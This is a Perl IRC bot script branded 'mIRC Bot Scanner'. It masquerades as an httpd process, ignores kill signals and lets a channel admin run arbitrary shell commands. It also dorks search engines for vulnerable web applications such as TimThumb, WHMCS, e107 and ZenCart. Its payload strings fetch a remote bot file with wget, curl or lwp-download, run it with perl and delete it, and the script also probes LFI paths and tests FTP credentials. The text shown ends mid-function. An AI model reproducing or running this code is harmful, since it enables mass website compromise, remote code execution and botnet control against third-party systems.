[+] mIRC Bot Scanner | By Dr.FarFar

/***
     ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄     ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄
    ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌   ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
    ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌   ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌
    ▐░▌       ▐░▌▐░▌       ▐░▌   ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌
    ▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌   ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌
    ▐░▌       ▐░▌▐░░░░░░░░░░░▌   ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
    ▐░▌       ▐░▌▐░█▀▀▀▀█░█▀▀    ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀█░█▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀█░█▀▀
    ▐░▌       ▐░▌▐░▌     ▐░▌     ▐░▌          ▐░▌       ▐░▌▐░▌     ▐░▌  ▐░▌          ▐░▌       ▐░▌▐░▌     ▐░▌
    ▐░█▄▄▄▄▄▄▄█░▌▐░▌      ▐░▌  ▄ ▐░▌          ▐░▌       ▐░▌▐░▌      ▐░▌ ▐░▌          ▐░▌       ▐░▌▐░▌      ▐░▌
    ▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌
     ▀▀▀▀▀▀▀▀▀▀   ▀         ▀  ▀  ▀            ▀         ▀  ▀         ▀  ▀            ▀         ▀  ▀         ▀


~~~ :xD: Have Fun. Don't Forget To Bookmark This Website :xD:
~~~ https://www.FaceBook.com/Dr.FarFar
~~~ http://Dr-FarFar.BlogSpot.com/

*/

########################################################################################################################

#!/usr/bin/perl

use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
use LWP::Simple;
use LWP 5.64;
use LWP::UserAgent;
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
use MIME::Base64;
use URI::Escape;
use Digest::MD5 qw(md5_hex);
use DBI;
use DBD::mysql;

my $datetime    = localtime;
my $fakeproc    = "/usr/sbin/httpd";
my $ircserver   = "irc.jatimcom.net";
my $ircport     = "7000";
my $nickname    = "BKHT-SC[".int(rand(100))."]";
my $ident       = "Biz";
my $channel     = "#biangkerox";
my $chanxxx     = "#biangkerox";
my $chaninfo    = "#biangkerox";
my $submitchan  = "#biangkerox";
my $admin       = "CaLiBeR";
my $fullname    = "9,1[4!9]11 C 12A 9L 4I 8B 13E 11R ";
my $rawmsg      = $ARGV[4];
my $msgraw      = $ARGV[5];

my $nob0dy  = "9,1[4!9]11 C 12A 9L 4I 8B 13E 11R ";
my $whmcslogo   = "9,1[4!9]11WHMCS 9<4=9> ";
my $thumblogo   = "9,1[4!9]11TimThumb 9<4=9> ";
my $zerologo    = "9,1[4!9]11zBoarD 9<4=9> ";
my $lfilogo = "9,1[4!9]11Lfi 9<4=9> ";
my $rfilogo = "9,1[4!9]11Rfi 9<4=9> ";
my $xmllogo = "9,1[4!9]11Xml 9<4=9> ";
my $oscologo    = "9,1[4!9]11Osco 9<4=9> ";
my $oscosqllogo = "9,1[4!9]11O-Sql 9<4=9> ";
my $e107logo    = "9,1[4!9]11E107 9<4=9> ";
my $ihlogo  = "9,1[4!9]11Is-Human 9<4=9> ";
my $zenlogo = "9,1[4!9]11ZenCart 9<4=9> ";
my $rfglogo = "9,1[4!9]11RfG 9<4=9> ";
my $whmcscmd    = '!whmcs';
my $thumbcmd    = "!timx";
my $zerocmd = "!zero";
my $lficmd  = "!lfi";
my $rficmd  = "!rfi";
my $xmlcmd  = "!xml";
my $e107cmd = "!e107";
my $zencmd  = "!zen";
my $ihcmd   = "!ishu";
my $oscocmd = "!osco";
my $cmdlfi  = "!cmdlf";
my $cmdxml  = "!cmdxm";
my $cmde107 = "!cmde10";
my $rfgcmd = "!rfg";
my $ftpcmd  = "!ftp";
my $spreadMode  = 1;
my $zerowget    = 1;
my $zerolwp = 1;
my $zerocurl    = 1;
my $gps     = 1;
my $gps2    = 0;
my $timot   = 10;
my $silentmode  = 0;
my $hostinjector = "http://flickr.com.splendidodesigns.com/";
my $thumbid = "http://".$hostinjector."/stunxx.php";
my $botdid = "http://".$hostinjector."/load.php";
my $botxdid = "http://".$hostinjector."/stunxx.php";
my $thumbshell = uri_escape($thumbid);
my $md5php = md5_hex($thumbid).".php";
my $md5bot = md5_hex($botdid).".php";
my $md5botx = md5_hex($botxdid).".php";
my $botid = uri_escape($botdid);
my $botxid = uri_escape($botxdid);
my $injector = "http://".$hostinjector."/bad.txt";
my $botshell = "http://".$hostinjector."/bot.txt";
my $subticket = "/submitticket.php?step=2&deptid=1";
my $action = "/data/lobex.php";
my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fbad.php;wget%20http://statcapcerdas.bps.go.id/elib/files/backup/link/bot.log;perl%20bot.log;rm%20bot.log";
my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fbad.php;lwp-download%20-a%20http://statcapcerdas.bps.go.id/elib/files/backup/link/bot.log;perl%20bot.log;rm%20bot.log";
my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fbad.php;curl%20-C%20-%20-O%20http://statcapcerdas.bps.go.id/elib/files/backup/link/bot.log;perl%20bot.log;rm%20bot.log";
my $uagent    = "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0";
my $lfdtest   = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
my @sitexxx     = ("www.iordachemarian.ro","www.anglais4xplusvite.ch/french","professor.sergiojr.info","northernart.co.th","fer.comoj.com","dateakademie.de");
my $jpath   = "/wp-includes/error.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
my $jack  = "http://".$jacks.$jpath;
my $jack1 = "http://www.vip2vip.net/administrator/includes/js/post.php?q=";
my $jack2 = "http://www.vip2vip.net/administrator/includes/js/post.php?q=";
my $jack3 = "http://www.vip2vip.net/administrator/includes/js/post.php?q=";
my $jack4 = "http://www.vip2vip.net/administrator/includes/js/post.php?q=";
my $jack5 = "http://barileatherfurniture.com/banner_images/cihui.php?q=";
my $engine  = "JacKAC,JacKAD,JacKAE,JacKAF,JacKAG,JacKAL,JacKAM,JacKAN,JacKAT,JacKAR,JacKAU,JacKBE,JacKHU,JacKOrG,JacKCoM,JacKNeT,JacKPL,JacKIT,JacKID,JacKMY,
                JacKES,JacKUK,JacKUS,JacKJP,JacKKR,JacKDE,JacKDK,JacKCA,JacKBR,JacKRO,JacKRU,JacKNL,JacKInfO,JacKFR,JacKIN,JacKMX,JacKCZ,JacKCL,JacKUA,
                JacKCN,JacKIR,JacKTH,JacKEU,JacKPH,JackIL,JackIM,JacKSI,JacKBIZ,GooGLe,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam";

$SIG{'INT'}   = 'IGNORE';
$SIG{'HUP'}   = 'IGNORE';
$SIG{'TERM'}  = 'IGNORE';
$SIG{'CHLD'}  = 'IGNORE';
$SIG{'PS'}    = 'IGNORE';
#chdir("/");
$ircserver = "$ARGV[0]" if $ARGV[0];
$ircport = "$ARGV[1]" if $ARGV[1];
$nickname = "$ARGV[2]" if $ARGV[2];
$channel = "$ARGV[3]" if $ARGV[3];
$0 = "$fakeproc"."\0" x 16;
my $pid = fork;
exit if $pid;
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
    if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
        print $IRC_cur_socket "$_[0]\n";
    }
}
sub connector {
    my $mynick = $_[0];
    my $ircserver_con = $_[1];
    my $ircport_con = $_[2];
    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
    if (defined($IRC_socket)) {
        $IRC_cur_socket = $IRC_socket;
        $IRC_socket->autoflush(1);
        $sel_client->add($IRC_socket);
        $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
        $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
        nick("$mynick");
        sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
        sleep(1);}}

sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
        sendraw("PONG :$1");
    }
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
        if (lc($1) eq lc($mynick)) {
            $mynick = $4;
            $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        }
    }
    elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
        nick("$mynick".int rand(1));
    }
    elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
        $mynick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        sendraw("MODE $mynick +Bx");
        sendraw("NS id qwe123");
        sleep(3);
        sendraw("JOIN $channel correct");
        sendraw("JOIN $chanxxx mejen");
        sleep(1);
    sendraw("PRIVMSG $channel :9,1[4!9]15 EhhEemmmm !!!");
        sendraw("PRIVMSG $admin :Hi $admin im here !!!");
    }
}

my $line_temp;
while( 1 ) {
    while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
    select(undef, undef, undef, 0.01);
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_client->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
        $IRC_cur_socket = $fh;
        $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
        $nread = sysread($fh, $ircmsg, 4096);
        if ($nread == 0) {
            $sel_client->remove($fh);

            $fh->close;
            delete($irc_servers{$fh});
        }
        @lines = split (/\n/, $ircmsg);
        $ircmsg =~ s/\r\n$//;
        if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
            my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
            if ($path eq $mynick) {
                if ($msg =~ /^PING (.*)/) {
                    sendraw("NOTICE $nick :PING $1");
                }
                if ($msg =~ /^VERSION/) {
                    sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey");
                }
                if ($msg =~ /^TIME/) {
                    sendraw("NOTICE $nick :TIME ".$datetime."");
                }
                if (&isAdmin($nick) && $msg eq "!die") {
                    &shell("$path","kill -9 $$");
                }
                if (&isAdmin($nick) && $msg eq "!killall") {
                    &shell("$path","killall -9 perl");
                }
                if (&isAdmin($nick) && $msg eq "!reset") {
                    sendraw("QUIT :Restarting...");
                }
                if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
                    sendraw("JOIN #".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
                    sendraw("PART #".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
                    sendraw("NICK ".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^!pid/) {
                    sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
                }
                if (&isAdmin($nick) && $msg !~ /^!/) {
                    &shell("$nick","$msg");
                }
                if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) {
                    sendraw("$rawmsg $msgraw ".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^!say (.+)/) {
                    sendraw("PRIVMSG $rawmsg ".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^!act (.+)/) {
                    sendraw("PRIVMSG $rawmsg :ACTION ".$1."");
                }
                if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    $newthumbcmd = $1;
                    $thumbcmd = $newthumbcmd;
                    &msg("$admin","$thumblogo9 Scan Command change to4 $thumbcmd ");
                }}}
                if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) {
                    $newzerocmd = $1;
                    $zerocmd = $newzerocmd;
                    &msg("$admin","$zerologo9 Scan Command change to4 $zerocmd ");
                }
                if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) {
                    $newwhmcscmd = $1;
                    $whmcscmd = $newwhmcscmd;
                    &msg("$admin","$whmcslogo9 Scan Command change to4 $whmcscmd ");
                }
                if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) {
                    $newtimot = $1;
                    $timot = $newtimot;
                    &msg("$admin","9,1 Get Content TimeOut change to4 $timot ");
                }
                if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    $newchan = $1;
                    $chanxxx = $newchan;
                    &msg("$admin","9,1 xChan change to4 $chanxxx ");
                }}}
            }
            else {
                if (&isAdmin($nick) && $msg eq "!die") {
                    &shell("$path","kill -9 $$");
                }
                if (&isAdmin($nick) && $msg eq "!killall") {
                    &shell("$path","killall -9 perl");
                }
                if (&isAdmin($nick) && $msg eq "!reset") {
                    sendraw("QUIT :Restarting...");
                }
                if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
                    sendraw("JOIN #".$1);
                }
                if (&isAdmin($nick) && $msg eq "!part") {
                    sendraw("PART $path");
                }
                if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
                    sendraw("PART #".$1);
                }
                if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
                    &shell("$path","$1");
                }
                if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
                    &shell("$path","$1");
                }
                if ($msg=~ /^!silent\s+(.*) -d/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    $smod = $1;
                if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; }
                elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; }
                    &msg("$path","9,1[4!9]Silent Mode15 $silentstat !!!!");
                }}}
                if ($msg=~ /^!jackx\s+(.*) -d/) {
                    $engmod = $1;
                if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACTIVATED"; }

                elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; }
                    &msg("$path","9,1[4!9]Jack Engine15 $gpsstat !!!!");
                }
                if ($msg=~ /^!engine\s+(.*) -d/) {
                    $engmod = $1;
                if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "ACTIVATED"; }
                elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; }
                    &msg("$path","9,1[4!9]Multi Engine15 $gpsstat !!!!");
                }
                if (&isAdmin($nick) && $msg =~ /^!injector\s+(.*) -d/) {
                    $newhostinjector= $1;
                    $hostinjector = $newhostinjector;
                    &msg("$path","9,1[4!9]Injector 15change to4 $hostinjector ");
                }
                if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
                    my $url = $1.$lfdtest;
                    my $cmd = $2;
                    &cmdlfi($url,$cmd,$path);
                }
                if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
                    my $url = $1;
                    my $cmd = $2;
                    &cmdxml($url,$cmd,$path);
                }
                if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
                    my $url = $1;
                    my $cmd = $2;
                    &cmde107($url,$cmd,$path);
                }
                ##################################################################### HELP COMMAND
                if ($msg=~ /^!help/) {
                    my $helplogo = "9,1[4!9]15Help 4<9=4> ";sleep(3);
                    &msg("$path","$helplogo9Timthumb Vuln Scan:15 $thumbcmd [bug] [dork] ");
                    &msg("$path","$helplogo9RFG Vuln Scan:15 $rfgcmd [bug] [dork] ");
                    &msg("$path","$helplogo9RFI Vuln Scan:15 $rficmd [bug] [dork] ");
                    &msg("$path","$helplogo9LFI Vuln Scan:15 $lficmd [bug] [dork] ");
                    &msg("$path","$helplogo9XML Vuln Scan:15 $xmlcmd [bug] [dork] ");
                    &msg("$path","$helplogo9e107 Vuln Scan:15 $e107cmd [dork] ");
                    &msg("$path","$helplogo9WHMCS Vuln Scan:15 $whmcscmd [dork] ");
                    &msg("$path","$helplogo9ZeroBoard Vuln Scan:15 $zerocmd [dork] ");
                    &msg("$path","$helplogo9osCommerce Vuln Scan:15 $oscocmd [dork] ");
                    &msg("$path","$helplogo9ZenCart Vuln Scan:15 $zencmd [dork] ");
                }
                if (&isAdmin($nick) && $msg =~ /^!pid/) {
                    &msg("$nick","6Fake Process/PID : $fakeproc - $$");
                }
                if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
                    if (&isFound($thumbid,"GIF89")) {
                        &msg("$path","9,1[4!9]Injector 4<9=4>9 Ready!!! ");
                    } else {
                        &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
                    }
                }
                if ($msg=~/^!bypass/){
                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";
                    my $cekby1 = &get_content($jack1."byroe");
                    if ($cekby1 =~ /byroe\.net/i){ $bystats1 = "9Up!!!"; } else { $bystats1 = "4Lost!!!"; }
                    my $cekby2 = &get_content($jack2."byroe");
                    if ($cekby2 =~ /byroe\.net/i){ $bystats2 = "9Up!!!"; } else { $bystats2 = "4Lost!!!"; }
                    my $cekby3 = &get_content($jack3."byroe");
                    if ($cekby3 =~ /byroe\.net/i){ $bystats3 = "9Up!!!"; } else { $bystats3 = "4Lost!!!"; }
                    my $cekby4 = &get_content($jack4."byroe");
                    if ($cekby4 =~ /byroe\.net/i){ $bystats4 = "9Up!!!"; } else { $bystats4 = "4Lost!!!"; }
                    my $cekby5 = &get_content($jack5."byroe");
                    if ($cekby5 =~ /byroe\.net/i){ $bystats5 = "9Up!!!"; } else { $bystats5 = "4Lost!!!"; }
                    &msg("$path","9,1[4!9]Bypass 4<9=4>15 JacK1=$bystats1 15JacK2=$bystats2 15JacK3=$bystats3 15JacK4=$bystats4 15JacK5=$bystats5")
                }}}
                ##################################################################### SCAN
                if ($msg =~ /^$oscocmd\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my $dork = $1;
                    my $simpan = 'situs.txt';
                        if (&isFound($thumbid,"GIF89")) {
                            &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan Oscommerce di 4$path ");
                            &msg("$path","$oscologo9Dork 4<9=4>15 $dork ");
                            &msg("$path","$oscologo9Search Engine 4<9=4>15 Loading ");
                            &se_start($path,"apalah",$simpan,$dork,$engine,9);
                            } else {
                            &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
                            }
                        }
                    }
                }
                if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my ($bug,$dork) = ($1,$2);
                    my $simpan = 'situs.txt';
                        if (&isFound($thumbid,"GIF89")) {
                            &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan LFI di 4$path ");
                            &msg("$path","$lfilogo9Dork 4<9=4>15 $dork ");
                            &msg("$path","$lfilogo9Bugz 4<9=4>15 $bug ");
                            &msg("$path","$lfilogo9Search Engine 4<9=4>15 Loading ");
                            &se_start($path,$bug,$simpan,$dork,$engine,3);
                            } else {
                            &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
                            }
                        }
                    }
                }
                if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my ($bug,$dork) = ($1,$2);
                    my $simpan = 'situs.txt';
                        if (&isFound($thumbid,"GIF89")) {
                            &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan RFI di 12$path ");
                            &msg("$path","$rfilogo9Dork 4<9=4>15 $dork ");
                            &msg("$path","$rfilogo9Bugz 4<9=4>15 $bug ");
                            &msg("$path","$rfilogo9Search Engine 4<9=4>15 Loading ");
                            &se_start($path,$bug,$simpan,$dork,$engine,5);
                            } else {
                            &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit;
                            }
                        }
                    }
                }
                if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my ($bug,$dork) = ($1,$2);
                    my $simpan = 'situs.txt';
                            &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan XML di 12$path ");
                            &msg("$path","$xmllogo9Dork 4<9=4>15 $dork ");
                            &msg("$path","$xmllogo9Bugz 4<9=4>15 $bug ");
                            &msg("$path","$xmllogo9Search Engine 4<9=4>15 Loading ");
                            &se_start($path,$bug,$simpan,$dork,$engine,6);
                        }
                    }
                }
                if ($msg =~ /^$thumbcmd\s+(.+?[.php])\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my ($bug,$dork) = ($1,$2);
                    my $simpan = 'situs.txt';
                        if ($bug =~ m/^\//){ &msg("$path","9,1[4!9]Bug nya gak usah pakek \/ di depan :p "); exit; } else {
                        if (&isFound($thumbid,"GIF89")) {
                            &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan TimTHumb di 12$path ");
                            &msg("$path","$thumblogo9Dork 4<9=4>15 $dork ");
                            &msg("$path","$thumblogo9Bugz 4<9=4>15 $bug ");
                            &msg("$path","$thumblogo9Search Engine 4<9=4>15 Loading ");
                            &se_start($path,$bug,$simpan,$dork,$engine,1);
                            } else {
                            &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! "); exit; }
                            }
                        }
                    }
                }
                if ($msg =~ /^$whmcscmd\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                        my ($bug,$dork) = ("cart.php?a=byroe&templatefile=",$1);
                        my $simpan = 'situs.txt';
                            &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan WHMCS di 12$path ");
                            &msg("$path","$whmcslogo9Dork 4<9=4>15 $dork ");
                            &msg("$path","$whmcslogo9Search Engine 4<9=4>15 Loading ");
                            &se_start($path,$bug,$simpan,$dork,$engine,2);
                        }
                    }
                }
                if ($msg =~ /^$zerocmd\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                        if (&isFound($thumbid,"GIF89")) {
                        my ($bug,$dork) = ("zboard.php?id=byroe",$1);
                        my $simpan = 'situs.txt';
                            &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan zboard di 12$path ");
                            &msg("$path","$zerologo9Dork 4<9=4>15 $dork ");
                            &msg("$path","$zerologo9Search Engine 4<9=4>15 Loading ");
                            &se_start($path,$bug,$simpan,$dork,$engine,4);
                            } else {
                            &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
                            }
                        }
                    }
                }
                if ($msg =~ /^$e107cmd\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                        if (&isFound($thumbid,"GIF89")) {
                        my ($bug,$dork) = ("contact.php",$1);
                        my $simpan = 'situs.txt';
                            &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan E107 di 12$path ");
                            &msg("$path","$e107logo9Dork 4<9=4>15 $dork ");
                            &msg("$path","$e107logo9Search Engine 4<9=4>15 Loading ");
                            &se_start($path,$bug,$simpan,$dork,$engine,7);
                            } else {
                            &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
                            }
                        }
                    }
                }
                if ($msg =~ /^$ihcmd\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                        if (&isFound($thumbid,"GIF89")) {
                        my ($bug,$dork) = ("wp-content/plugins/is-human/engine.php",$1);
                        my $simpan = 'situs.txt';
                            &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan Is-Human di 12$path ");
                            &msg("$path","$ihlogo9Dork 4<9=4>15 $dork ");
                            &msg("$path","$ihlogo9Search Engine 4<9=4>15 Loading ");
                            &se_start($path,$bug,$simpan,$dork,$engine,8);
                            } else {
                            &msg("$path","9,1[4!9]Injector 4<9=4>15 Lost!!! ");
                            }
                        }
                    }
                }
                if ($msg =~ /^$zencmd\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                        my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
                        my $simpan = 'situs.txt';
                        &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan ZenCart di 12$path ");
                        &msg("$path","$zenlogo9Dork 4<9=4>15 $dork ");
                        &msg("$path","$zenlogo9Search Engine 4<9=4>15 Loading ");
                        &se_start($path,$bug,$simpan,$dork,$engine,10);
                        }
                    }
                }
                if ($msg =~ /^$rfgcmd\s+(.*)/) {
                    if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                        my ($bug,$dork) = ("apalah",$1);
                        my $simpan = 'situs.txt';
                        &msg("$chanxxx","9,1[4!9]15Lapor 4<9=4> 9$nick 15lagi scan RFG di 12$path ");
                        &msg("$path","$rfglogo9Dork 4<9=4>15 $dork ");
                        &msg("$path","$rfglogo9Search Engine 4<9=4>15 Loading ");
                        &se_start($path,$bug,$simpan,$dork,$engine,11);
                    }
                    }
                }
                if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) {
                my $url = $_[0];
                my $host = $_[1];
                my $user = $_[2];
                my $pass = $_[3];
                    if (my $pid = fork) {
                        waitpid($pid, 0);
                    } else {
                        if (fork) { exit; } else {
                my ($host,$user,$pass) = ($1,$2,$3);
                    &msg("$path","9,1[4!9]FTP 4<9=4>15 Checking $host | $user:$pass");
                    my $success = 1;
                    use Net::FTP;
                    my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
                    $success = 0 if $ftp->login($user,$pass);
                    $ftp->quit;
                    if ($success == 0) {
                        &notice("$nick","15,1 [9FTP15] [ 9http://".$host." 15] [".$user.":".$pass."15] 9Success ");
                        } else {
                        &notice("$nick","15,1 [9FTP15] [ 9http://".$host." 15] [".$user.":".$pass."15] 4Denied ");

                    }
                }
            }
        }
    }
}
        for(my $c=0; $c<= $#lines; $c++) {
            $line = $lines[$c];
            $line = $line_temp.$line if ($line_temp);
            $line_temp = '';
            $line =~ s/\r$//;
            unless ($c == $#lines) {

                parse("$line");
            } else {
                if ($#lines == 0) {
                    parse("$line");
                } elsif ($lines[$c] =~ /\r$/) {
                    parse("$line");
                } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
                    parse("$line");
                } else {
                    $line_temp = $line;
                }
            }
        }
    }
}

##################################################################################

sub type() {
my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
    if ($type == 1){$type=&thumb_exploit($chan,$bug,$simpan,$dork,$engine);}
    elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$simpan,$dork,$engine);}
    elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$simpan,$dork,$engine);}
    elsif ($type == 4){$type=&zero_exploit($chan,$bug,$simpan,$dork,$engine);}
    elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$simpan,$dork,$engine);}
    elsif ($type == 6){$type=&xml_exploit($chan,$bug,$simpan,$dork,$engine);}
    elsif ($type == 7){$type=&e107_exploit($chan,$bug,$simpan,$dork,$engine);}
    elsif ($type == 8){$type=&ih_exploit($chan,$bug,$simpan,$dork,$engine);}
    elsif ($type == 9){$type=&osco_exploit($chan,$bug,$simpan,$dork,$engine);}
    elsif ($type == 10){$type=&zen_exploit($chan,$bug,$simpan,$dork,$engine);}
